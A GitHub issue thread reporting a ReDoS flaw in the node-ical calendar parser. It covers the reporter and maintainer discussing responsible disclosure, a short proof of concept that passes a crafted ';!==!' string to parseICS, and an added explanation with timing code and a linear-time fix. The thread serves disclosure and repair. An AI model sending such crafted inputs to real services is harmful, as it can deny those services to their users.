ReDoS in node-ical #153
Comments
Please make this security report public on huntr rather than keeping it private.
Sorry, I don't have permission to make this security report public on huntr. Only after this report is confirmed can it be made public. You can use your GitHub account to log in and access.
What's wrong in posting this information here directly on GitHub?
Others suggested that I should do a responsible disclosure, that is, I should not open an issue until the report has been validated. Once the report is made public but not repaired in time, it may pose a certain risk.
No problem here with that. node-ical is no mission-critical application and I am not a security nerd either. Simply post it and I will see that I try to review it ASAP.
Thank you for your understanding!

Proof of Concept

```js
// Proof of concept as posted in the report: node-ical's parser is fed a
// crafted string of repeated ";!==!" parameter-like segments, which
// triggers the ReDoS.
var nodeIcal = require("node-ical");
var str = "!!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!!";
nodeIcal.parseICS(str);
```
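As an added example (this is not code from the report or from node-ical), the following shows the mechanism behind a ReDoS of this shape and a linear-time alternative. The regex `VULNERABLE_PARAM_RE`, the helper names and the `'a'…'!'` pathological input are assumptions made for illustration; the actual pattern inside node-ical is not shown on this page. The `POC` constant is the string posted above, copied verbatim.

```javascript
// Added illustration (not node-ical's code): why a crafted parameter
// string like the PoC above can hang a regex-based parser, and a
// linear-time scan that splits the same input safely.

// ASSUMPTION: a hypothetical regex with the vulnerable shape, written to
// match a ';'-separated list of "name=value" items with an optional value
// and an optional trailing ';'. It is NOT the pattern from node-ical,
// which the report above does not show.
const VULNERABLE_PARAM_RE = /^(?:[A-Za-z0-9-]+(?:=[^;]*)?;?)*$/;

// Input this regex cannot match: a run of n name characters followed by a
// character ('!') that no part of the pattern accepts. Because both the
// value and the ';' are optional, the repeated group may end after any
// prefix of the run, so the engine has 2^(n-1) ways to split the run into
// groups and tries every one of them before reporting failure.
function pathologicalInput(n) {
  return 'a'.repeat(n) + '!';
}

// Wall-clock milliseconds spent in fn().
function timeMs(fn) {
  const start = process.hrtime.bigint();
  fn();
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Time the regex on pathological inputs of increasing length. Each +1 in
// n roughly doubles the time: the signature of catastrophic backtracking.
function measureGrowth(re, lengths) {
  return lengths.map((n) => {
    const input = pathologicalInput(n);
    return { n, ms: timeMs(() => re.test(input)) };
  });
}

// Linear-time replacement: one pass that splits the list on ';' and each
// item on its first '='. Later '=' characters stay in the value, which is
// exactly what the "!==!" items in the PoC exercise. Every character is
// examined once, so the cost grows linearly with the input length.
function parseParams(str) {
  const params = [];
  for (const item of str.split(';')) {
    if (item === '') continue; // tolerate "a=1;;b=2" and a trailing ';'
    const eq = item.indexOf('=');
    params.push(
      eq === -1
        ? { name: item, value: null }
        : { name: item.slice(0, eq), value: item.slice(eq + 1) }
    );
  }
  return params;
}

// The string posted in the report, copied verbatim.
const POC = "!!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!!";

// Demonstration output (timings are machine dependent).
console.log('vulnerable regex on growing pathological input:');
for (const { n, ms } of measureGrowth(VULNERABLE_PARAM_RE, [12, 16, 20])) {
  console.log(`  n=${n}: ${ms.toFixed(2)} ms`);
}
const linearMs = timeMs(() => parseParams(POC));
console.log(`linear scan on the PoC (${POC.length} chars): ${linearMs.toFixed(3)} ms, ${parseParams(POC).length} items`);
```

The design point is that the fix is not a cleverer regex but the removal of the nested, overlapping quantifiers: `parseParams` decides where each item and each value ends with a single `indexOf`/`split`, so there is nothing for an attacker's input to make the engine backtrack over.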
A relatively simple patch, you can use the package
Hey Jens,
Recently I found a potential ReDoS vulnerability inside node-ical and provided some proper examples. You can access the vulnerability details at huntr. Please feel free to get in touch if there are any more issues.

Best regards,
Yeting